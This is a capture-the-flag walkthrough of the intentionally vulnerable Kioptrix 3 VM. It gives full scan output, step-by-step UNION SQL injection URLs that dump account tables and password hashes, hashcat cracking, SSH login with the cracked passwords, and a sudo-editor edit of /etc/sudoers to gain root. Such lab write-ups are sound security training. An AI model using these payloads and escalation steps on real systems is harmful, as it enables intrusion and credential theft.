VulnHub - Kioptrix Level 1.2 #3

Lets continue the Kioptrix series with Kioptrix Level 1.2 #3

## Objective

The Kioptrix series is aimed and beginners and thus are pretty easy challenges. The objective is getting root access to the vm via any means possible, except by hacking the actual vm client. The purpose of these vulnerable vm’s are to learn the basic techniques and tools used in penetration tests. There are more than one way of achieving the objective in this challenge.

The Kioptrix Level 1.1 VM can be downloaded from here. Note that it is an vmware image and can be used in vmware workstation or player. You can convert the image to be compatible with virtualbox.

## The Hack

The first step with every penetration test is intellegence gathering. This consists of passive / active recon and enumeration. Find out which services are running on the target server that are open to the world and which version they are using so that you can search for known vulnerabilities.

To achieve this we will be using a tool that will become the foundation of your pentesting toolkit. Nmap. nmap man page can be found here - it will explain all the options / flags / arguments usable with nmap.

apb@stratios:~$ nmap -vv --reason -sV -sC -Pn --min-rate=400 -T4 --script-timeout 10m -p-  192.168.163.134

Nmap scan report for 192.168.163.134
Host is up, received user-set (0.00025s latency).
Not shown: 65533 closed ports
Reason: 65533 conn-refused
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAL4CpDFXD9Zn2ONktcyGQL37Dn6s9JaOv3oKjxfdiABm9GjRkLEtbSAK3vhBBUJTZcVKYZk21lFHAqoe/+pLr4U9yOLOBbSoKNSxQ2VHN9FOLc9C58hKMF/0sjDsSIZnaI4zO7M4HmdEMYXONrmj2x6qczbfqecs+z4cEYVUF3R3AAAAFQCuG9mm7mLm1GGqZRSICZ+omMZkKQAAAIEAnj8NDH48hL+Pp06GWQZOlhte8JRZT5do6n8+bCgRSOvaYLYGoNi/GBzlET6tMSjWMsyhVY/YKTNTXRjqzS1DqbODM7M1GzLjsmGtVlkLoQafV6HJ25JsKPCEzSImjeOCpzwRP5opjmMrYBMjjKqtIlWYpaUijT4uR08tdaTxCukAAACBAJeJ9j2DTugDAy+SLCa0dZCH+jnclNo3o6oINF1FjzICdgDONL2YbBeU3CiAL2BureorAE0lturvvrIC2xVn2vHhrLpz6NPbDAkrLV2/rwoavbCkYGrwXdBHd5ObqBIkoUKbI1hGIGA51nafI2tjoXPfIeHeNOep20hgr32x9x1x
|   2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAyOv6c+5ON+N+ZNDtjetiZ0eUxnIR1U0UqSF+a24Pz2xqdnJC1EN0O3zxGJB3gfPdJlyqUDiozbEth1GBP//8wbWsa1pLJOL1YmcumEJCsitngnrVN7huACG127UjKP8hArECjCHzc1P372gN3AQ/h5aZd0VV17e03HnAJ64ZziOQzVJ+DKWJbiHoXC2cdD1P+nlhK5fULe0QBvmA14gkl2LWA6KILHiisHZpF+V3X7NvXYyCSSI9GeXwhW4RKOCGdGVbjYf7d93K9gj0oU7dHrbdNKgX0WosuhMuXmKleHkIxfyLAILYWrRRj0GVdhZfbI99J3TYaR/yLTpb0D6mhw==
80/tcp open  http    syn-ack Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

# Nmap done at Mon Feb 26 13:58:26 2018 -- 1 IP address (1 host up) scanned in 8.44 seconds

Only port 22 and 80 are open. Browse to the ip and lets see what is happening on port 80

They seem to be running LotusCMS. We can look for a version and see if there are known vulnerabilities. There is also a login page. aybe it’s vulnerable to sqli.

Let’s run a nikto quickly against the web server and see if it picks up anything.

- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.163.134
+ Target Port: 80
+ GET Cookie PHPSESSID created without the httponly flag
+ GET Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ GET Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 21:22:00 2009
+ DUOJJMCX Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: TRACE HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: GET /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: GET /icons/: Directory indexing found.
+ OSVDB-3233: GET /icons/README: Apache default file found.
+ GET /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: GET /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.

After going through the nikto results we see they are running phpmyadmin. phpmyadmin is a web interface (lazy admins) to manage mysql databses.

Let’s see if we can access phpmyadmin.

Since we know they are running a CMS and phpmyadmin, which requires a sql backend, we can attempt a sqli.

…. and the injection is successfull..

Let’s snoop around and see what we can find out..

  • Couple of minutes later*

After a quick look there doesn’t seem to be anything of value.

Let’s move on to the website / blog that’s running on the host.

On the website’s home page they seem to be going on about a new image gallery.. so after browsing through a couple of pages within the gallery and using their “sort function”, something caught my eye. In the url, “id=1”.

Full url: http://kioptrixtrix3.com/gallery/gallery.php?id=1&sort=dateuploaded#photos

It might be vulnerable to sqli. Let’s find out.

Modify the url to include a ‘ after the id=1

http://kioptrixtrix3.com/gallery/gallery.php?id=1'

And we got a sql error which means that it is vulnerable to sqli. If there was no error, then the link would have been safe.

Next we need to try and figure out how many columns this table has.

We use the same url to query the database. sql query

order by 1 --

modified url

http://kioptrixtrix3.com/gallery/gallery.php?id=1 order by 1 --

If you don’t receive an error then carry on incrementing “order by 1” by 1 until you receive an error. When you reach an error page, then there are n-1 columns.

In this case, you will get a error at

http://kioptrixtrix3.com/gallery/gallery.php?id=1 order by 7 --

To determine the number of columns, it would be the error page number -1; n-1; which is 7 - 1, so this table has 6 columns.

Now that we know there are 6 columns, we need to determine which one is vulnerable.

We will use the “union select columns sequence” to find the vulnerable column in the table.

sql query

-1 union select 1,2,3,4,5,6  --

modified url

http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,2,3,4,5,6 --

Depending on the database, the above might not work, so give the following a try

http://kioptrixtrix3.com/gallery/gallery.php?id=-1 and 1=2 union select 1,2,3,4,5,6 --

It will show some numbers in the page, and it must be less than or equal to the number of columns.

Under “Sub Gallery” it is display 2 and 3. These could be our vulnerable points.

Let’s test and confirm.

Simple test would be to see if we can get the database version.

By using the “union select columns sequence” and replacing the 2 or 3 with “version()” or “@@version”.

http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,version(),3,4,5,6 --

and

http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,2,@@version,4,5,6 --

or both

http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,@@version,version(),4,5,6 --

As we can see, it is using mysql 5.0.51a.

Let’s see which database and user the gallery is using.

http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,database(),user(),4,5,6 --

Database: gallery User: root

Next we have to find table names in the database. Replace the 2 or 3 with “group_concat(table_name)” and add “from information_schema.tables where table_schema=database()” at the end before the –

http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database() --

Now we have the tables stored in the database, and the dev_accounts looks the most promising.

Lets see if we can find out the columns within that table.

We need to make two changes to the statement.

First replace the “group_concat(table_name) with the “group_concat(column_name)”.

Then replace “from information_schema.tables where table_schema=database()” with “FROM information_schema.columns WHERE table_name=mysqlchar”

http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,group_concat(column_name),3,4,5,6 FROM information_schema.columns WHERE table_name=mysqlchar

Next we need to convert the table name to MysSQL CHAR() string to replace mysqlchar with.

I used the hackbar addon for firefox to achieve this. Once the bar is installed you can go SQL –> MySQL –> MYSQL CHAR().

A box will pop up where you enter the table name and it will convert it to CHAR.

CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,group_concat(column_name),3,4,5,6 FROM information_schema.columns WHERE table_name=CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)

Now we have the column names of the dev_accounts table and we are especially interested in the username and password columns.

Next we try and read the data stored in the username and password column.

Again a couple of changes to the sql statement.

Replace the “group_concat(column_name)” with “group_concat(columnname,0x3a,anothercolumnname)”

Replace the “from information_schema.columns where table_name=CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)” with the “from table_name”

http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,group_concat(username,0x3a,password),3,4,5,6 FROM dev_accounts --

…. and there we have two usernames with their password hashes.

Lets see if we can crack the passwords.

Put the two hashes in a file.

apb@stratios:/tmp$ cat hashes.txt 
0d3eccfb887aabd50f243b3f155c0f85
5badcaf789d3d1d09794d8f021f40f0e

Using hashcat with the rockyou.txt wordlist that came with kali.

apb@stratios:/tmp$ hashcat -m 0 hashes.txt --force /usr/share/wordlists/rockyou.txt

hashcat (v4.0.1) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i5-6300U CPU @ 2.40GHz, 1024/2944 MB allocatable, 2MCU

Hashes: 2 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash

Password length minimum: 0
Password length maximum: 256

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

- Device #1: autotuned kernel-accel to 1024
- Device #1: autotuned kernel-loops to 1
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => [s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =>
Session..........: hashcat
Status...........: Running
Hash.Type........: MD5
Hash.Target......: hashes.txt
Time.Started.....: Tue Feb 27 12:09:20 2018 (0 secs)
Time.Estimated...: Tue Feb 27 12:09:20 2018 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:        0 H/s (0.00ms)
Recovered........: 0/2 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 0/14344385 (0.00%)
Rejected.........: 0/0 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Candidates.#1....: [Copying]
HWMon.Dev.#1.....: N/A

5badcaf789d3d1d09794d8f021f40f0e:starwars
0d3eccfb887aabd50f243b3f155c0f85:Mast3r

Session..........: hashcat
Status...........: Cracked
Hash.Type........: MD5
Hash.Target......: hashes.txt
Time.Started.....: Tue Feb 27 12:09:20 2018 (5 secs)
Time.Estimated...: Tue Feb 27 12:09:25 2018 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:  2198.2 kH/s (0.66ms)
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10835968/14344385 (75.54%)
Rejected.........: 0/10835968 (0.00%)
Restore.Point....: 10833920/14344385 (75.53%)
Candidates.#1....: MasterFlick -> MarkBryan98
HWMon.Dev.#1.....: N/A

Started: Tue Feb 27 12:08:52 2018
Stopped: Tue Feb 27 12:09:26 2018

And there are our passwords.

5badcaf789d3d1d09794d8f021f40f0e:starwars
0d3eccfb887aabd50f243b3f155c0f85:Mast3r

Now we can try and ssh into the server with the above credentials.

apb@stratios:~$ ssh loneferret@192.168.163.134
loneferret@192.168.163.134's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106

loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README

loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO

Let’s see what we are allowed to run with sudo

loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht

So we can edit files using this “ht” program. Let’s see if we can edit the /etc/sudoers file and give ourselves permission to su to root

loneferret@Kioptrix3:~$ sudo ht /etc/sudoers

… my. poor. eyes…

anyway..

Press ALT + F to open the FIle Menu and select Open

Select /etc/sudoers

Once the file is open, add the following:

loneferret ALL=(ALL) ALL

and remove

loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht

Save and quit the file.

Now try to sudo su -

loneferret@Kioptrix3:~$ sudo su -
root@Kioptrix3:~#

And there we have root access to the target machine.

This one was defenitely more challenging than the first two. Had to read up quite a bit for the sqli queries. But this is how one learns and you cannot beat the satasfactory feeling of solving a problem.

Updated: